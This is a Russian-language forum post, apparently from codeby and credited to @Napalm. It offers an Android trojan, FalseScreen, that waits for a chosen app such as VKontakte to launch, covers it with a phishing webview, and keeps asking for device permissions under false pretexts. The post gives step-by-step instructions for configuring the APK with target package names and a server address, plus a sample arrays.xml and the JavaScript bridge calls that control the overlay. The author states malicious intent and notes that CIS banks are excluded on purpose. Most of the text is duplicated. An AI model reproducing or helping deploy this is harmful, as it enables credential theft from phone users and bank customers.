Вечер добрый, хочу добавить немного зла в этот мир. В общем, я написал софт который во время запуска определённого приложения, подменяет его и открывает webview с нужной нам интернет страницей.
Я дам вам apk, в нём необходимо модифицировать ресурсы с помощью апк эдитора, я положил его в архив(обратите внимание это не оригинальный apkEditor, а модификация. Я нашёл его на одном русскоязычном форуме, мод исправляет отображение массивов). Ниже я приведу подробную инструкцию, по редактированию ресурсов через ApkEditor, вы можете попробовать проделать тоже самое через apktool, но лично у меня ничего, apktool не хочет собирать apk обратно.
Инструкция
1) Скачиваем содержимое архива на телефон, устанавливаем ApkEditor
2) Запускаем ApkEditor
3) Нажимаем "Выберете файл APK" находим скачанный FalseScreen.apk
4) Далее: полное редактирование->редатировать все файлы->вкладка файл->
5) Открываем файл arrays.xml меняем "
6) Сохраняем файл, нажимаем "сборка"
7) Наш apk готов
Демонстрация
После открытия, наш троян с определённым временным интервалом будет под разными предлогами выпрашивать права.
Текст сообщения можно изменить, в ресурсах
Ну собственно запуск:
Возможности
Косяки
Я мало уделял внимания тестированию, а весь код состоит из костылей и чёрной магии, следовательно багов будет много
Данный скрипт меняет цвет NavigationBar-a цвет указывайте вместо #528bcc
Выполнив данный скрипт фишинг для данного приложения прекращается и начинается отслеживание следующего приложения в очереди.
Опишите то чего вам здесь не хватает, до тех пор пока я не забил, могу что нибуть реализовать
Буду рад услышать ваши отзывы идеи, предложения, оскорбления и угрозы. если что не понятно пишите попробую объяснить.
P.S. Прошу прощения за совершённые мной орфографические ошибки, данная статья писалась поздно ночью, сейчас уже утро, моя голова не работать, слабая плоть
Софт работает на Android 6+(если комуто надо могу запустить на Android 5.1)
Кто скачал, будьте добры отпишите: Всё ли работает и на чём тестируете. Я очень не уверен в коде отвечающем за закрытие приложения. Так же сам процесс может умирать, я не знаю как обстоят дела с китайцами.
Автор @Napalm
источник codeby
Я дам вам apk, в нём необходимо модифицировать ресурсы с помощью апк эдитора, я положил его в архив(обратите внимание это не оригинальный apkEditor, а модификация. Я нашёл его на одном русскоязычном форуме, мод исправляет отображение массивов). Ниже я приведу подробную инструкцию, по редактированию ресурсов через ApkEditor, вы можете попробовать проделать тоже самое через apktool, но лично у меня ничего, apktool не хочет собирать apk обратно.
Инструкция
1) Скачиваем содержимое архива на телефон, устанавливаем ApkEditor
2) Запускаем ApkEditor
3) Нажимаем "Выберете файл APK" находим скачанный FalseScreen.apk
4) Далее: полное редактирование->редатировать все файлы->вкладка файл->
res/values/arrays.xml
5) Открываем файл arrays.xml меняем "
com.android.example" на имя нужного нам пакета (имя пакета можно узнать через ApkEditor или PlayMarket), также меняем "http://my.server" на адрес любого веб сайта.
6) Сохраняем файл, нажимаем "сборка"
7) Наш apk готов
Демонстрация
После открытия, наш троян с определённым временным интервалом будет под разными предлогами выпрашивать права.
Текст сообщения можно изменить, в ресурсах
/res/values/strng.xml (также можно поменять название приложения).Ну собственно запуск:
Возможности
- Автозагрузка будет работать только если приложение было хоть раз запущено
- Приложение закрывается при нажатии кнопок "домой" и "меню"
- Вы можете работать сразу по нескольким приложениям, для этого просто добавляйте больше item-ов в arrays.xml
XML:
<string-array name="prog_list">
<item>com.vkontakte.android</item>
<item>ru.fourpda.client</item>
</string-array>
<string-array name="server_addr">
<item>http://192.168.0.20/</item>
<item>http://yandex.ru</item>
</string-array>
Я мало уделял внимания тестированию, а весь код состоит из костылей и чёрной магии, следовательно багов будет много
- Не всегда работает скрытие окна т.е. при нажатие кнопок "домой" или "меню" приложение не закроется и будет висеть в списке открытых приложений
- Кнопка "назад" ничего не делает в принципе могу реальзовать навигацию по webview-у
- Иногда после запуска требуется перезагрузка
- На СНГ банках не будет работать фишинг, я сделал это намеренно
Код:
<script type="text/javascript">JAVA.SetNavigationBarColor('#528bcc')</script>
Код:
<script>JAVA.OK()</script>
Опишите то чего вам здесь не хватает, до тех пор пока я не забил, могу что нибуть реализовать
Буду рад услышать ваши отзывы идеи, предложения, оскорбления и угрозы. если что не понятно пишите попробую объяснить.
P.S. Прошу прощения за совершённые мной орфографические ошибки, данная статья писалась поздно ночью, сейчас уже утро, моя голова не работать, слабая плоть
Софт работает на Android 6+(если комуто надо могу запустить на Android 5.1)
Кто скачал, будьте добры отпишите: Всё ли работает и на чём тестируете. Я очень не уверен в коде отвечающем за закрытие приложения. Так же сам процесс может умирать, я не знаю как обстоят дела с китайцами.
Автор @Napalm
источник codeby